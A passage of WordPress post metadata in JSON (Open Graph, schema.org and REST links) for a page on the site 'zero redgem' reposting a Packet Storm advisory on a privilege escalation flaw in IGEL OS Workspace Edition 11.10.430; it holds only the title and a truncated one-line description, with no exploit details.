11.10.430 Privilege Escalation_PACKETSTORM:213196 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-12-22T18:24:57&#8243;,&#8221;description&#8221;:&#8221;IGEL OS Workspace Edition version 11.10.430 suffers from a privilege escalation vulnerability. This vulnerability demonstrates how architectural trust in custom configuration frameworks can be abused...","og_url":"https:\/\/zero.redgem.net\/?p=32461","og_site_name":"zero redgem","article_published_time":"2025-12-22T12:37:23+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"11 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=32461#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=32461"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 IGEL OS Workspace Edition 11.10.430 Privilege Escalation_PACKETSTORM:213196","datePublished":"2025-12-22T12:37:23+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=32461"},"wordCount":2185,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=32461#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=32461","url":"https:\/\/zero.redgem.net\/?p=32461","name":"\ud83d\udcc4 IGEL OS Workspace Edition 11.10.430 Privilege Escalation_PACKETSTORM:213196 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-22T12:37:23+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=32461#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=32461"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=32461#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 IGEL OS Workspace Edition 11.10.430 Privilege Escalation_PACKETSTORM:213196"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/32461","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=32461"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/32461\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=32461"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=32461"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=32461"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}